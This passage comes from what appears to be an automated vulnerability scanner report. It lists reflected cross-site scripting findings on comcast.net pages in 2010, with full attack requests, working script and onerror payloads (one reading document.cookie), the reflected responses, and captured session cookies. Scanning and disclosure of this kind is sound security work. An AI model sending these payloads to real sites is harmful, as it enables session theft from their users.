<link rel="alternate" href="/feeds/rss/news/politicsc7b71"><script>alert(1)</script>f076230e9b9/" type="application/rss+xml" title="Comcast.net - News" id="rss" />
...[SNIP]...

2.165. http://www.comcast.net/news/politics/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/politics/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7033f<img%20src%3da%20onerror%3dalert(1)>274078d2372 was submitted in the REST URL parameter 2. This input was echoed as 7033f<img src=a onerror=alert(1)>274078d2372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/politics7033f<img%20src%3da%20onerror%3dalert(1)>274078d2372/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:23 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:23 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='news' subchannel'politics7033f<img src=a onerror=alert(1)>274078d2372'</h2>
...[SNIP]...

2.166. http://www.comcast.net/news/politics/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/politics/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c34ca--><img%20src%3da%20onerror%3dalert(1)>6cceb973248 was submitted in the REST URL parameter 2. This input was echoed as c34ca--><img src=a onerror=alert(1)>6cceb973248 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/politicsc34ca--><img%20src%3da%20onerror%3dalert(1)>6cceb973248/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:28 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:28 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: politicsc34ca--><img src=a onerror=alert(1)>6cceb973248 -->
...[SNIP]...

2.167. http://www.comcast.net/news/world/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/world/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8771d"><script>alert(1)</script>ed2178a344a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/world8771d"><script>alert(1)</script>ed2178a344a/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:12 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:12 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/news/world8771d"><script>alert(1)</script>ed2178a344a/" type="application/rss+xml" title="Comcast.net - News" id="rss" />
...[SNIP]...

2.168. http://www.comcast.net/news/world/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/world/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94c04<img%20src%3da%20onerror%3dalert(1)>82df29b4567 was submitted in the REST URL parameter 2. This input was echoed as 94c04<img src=a onerror=alert(1)>82df29b4567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/world94c04<img%20src%3da%20onerror%3dalert(1)>82df29b4567/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:24 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:24 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='news' subchannel'world94c04<img src=a onerror=alert(1)>82df29b4567'</h2>
...[SNIP]...

2.169. http://www.comcast.net/news/world/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/world/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload bedb8--><img%20src%3da%20onerror%3dalert(1)>e40b1a4d5bd was submitted in the REST URL parameter 2. This input was echoed as bedb8--><img src=a onerror=alert(1)>e40b1a4d5bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/worldbedb8--><img%20src%3da%20onerror%3dalert(1)>e40b1a4d5bd/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:29 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: worldbedb8--><img src=a onerror=alert(1)>e40b1a4d5bd -->
...[SNIP]...

2.170. http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/entertainment-mostpopulargooglesearches2010/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3f48"><script>alert(1)</script>bce088a4eb7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /slideshow/entertainment-mostpopulargooglesearches2010f3f48"><script>alert(1)</script>bce088a4eb7/ HTTP/1.1
Host: www.comcast.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEkzu4Y4ACqRj; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; ev41=%26%23039%3B; xuc=c=2; page_counts=2,2; s_lastVisit=11/2010; prefs=pagemsg.state=false; s_cc=true; s_campaign=NET_33_0; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; mbox=check#true#1292781931|session#1292781870292-178614#1292783731

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:06:31 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:11:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:06:31 GMT
Connection: close
Content-Length: 32456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/entertainment-mostpopulargooglesearches2010f3f48"><script>alert(1)</script>bce088a4eb7/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.171. http://www.comcast.net/slideshow/finance-branddisasters/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/finance-branddisasters/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c9a"><script>alert(1)</script>cf869bb5a0f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /slideshow/finance-branddisasters15c9a"><script>alert(1)</script>cf869bb5a0f/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:11:31 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:16:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:11:31 GMT
Content-Length: 31820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/finance-branddisasters15c9a"><script>alert(1)</script>cf869bb5a0f/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.172. http://www.comcast.net/slideshow/music-greenday [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/music-greenday

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e38"><script>alert(1)</script>2b6b246c1a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /slideshow/music-greenday89e38"><script>alert(1)</script>2b6b246c1a3 HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:11:35 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:16:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:11:35 GMT
Content-Length: 31730
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/music-greenday89e38"><script>alert(1)</script>2b6b246c1a3/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.173. http://www.comcast.net/slideshow/news-spacepictures [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/news-spacepictures

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cae2"><script>alert(1)</script>5af3151e2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /slideshow/news-spacepictures6cae2"><script>alert(1)</script>5af3151e2b HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:11:32 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:16:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:11:32 GMT
Content-Length: 31725
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/news-spacepictures6cae2"><script>alert(1)</script>5af3151e2b/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.174. http://www.comcast.net/slideshow/sports-bestdressedathletes/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/sports-bestdressedathletes/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef90d"><script>alert(1)</script>0349d93d9fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /slideshow/sports-bestdressedathletesef90d"><script>alert(1)</script>0349d93d9fb/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:11:33 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:16:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:11:33 GMT
Content-Length: 31876
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/sports-bestdressedathletesef90d"><script>alert(1)</script>0349d93d9fb/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.175. http://www.comcast.net/weather/19103/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /weather/19103/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 74f43--><img%20src%3da%20onerror%3dalert(1)>935e2e5728f was submitted in the REST URL parameter 2. This input was echoed as 74f43--><img src=a onerror=alert(1)>935e2e5728f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /weather/1910374f43--><img%20src%3da%20onerror%3dalert(1)>935e2e5728f/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:35 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta ht
...[SNIP]...
<!-- subchannel: 1910374f43--><img src=a onerror=alert(1)>935e2e5728f -->
...[SNIP]...

2.176. http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/a [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2f676<img%20src%3da%20onerror%3dalert(1)>46d5a7f7ec5 was submitted in the REST URL parameter 2. This input was echoed as 2f676<img src=a onerror=alert(1)>46d5a7f7ec5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f2f676<img%20src%3da%20onerror%3dalert(1)>46d5a7f7ec5/a HTTP/1.1
Host: www.comcast.net
Proxy-Connection: keep-alive
Referer: http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEkzu4Y4ACqRj; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; xuc=c=2; prefs=pagemsg.state=false; page_counts=4,2; s_lastVisit=11/2010; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1292781870292-178614#1292784860|PC#1292781870292-178614.20#1293992600|check#true#1292783060; fsr.a=1292782999825

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:35:40 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:40:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:35:40 GMT
Connection: close
Content-Length: 37346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta ht
...[SNIP]...
<img src=a onerror=alert(document.cookie)>935e2e5728f2f676<img src=a onerror=alert(1)>46d5a7f7ec5 -->
...[SNIP]...

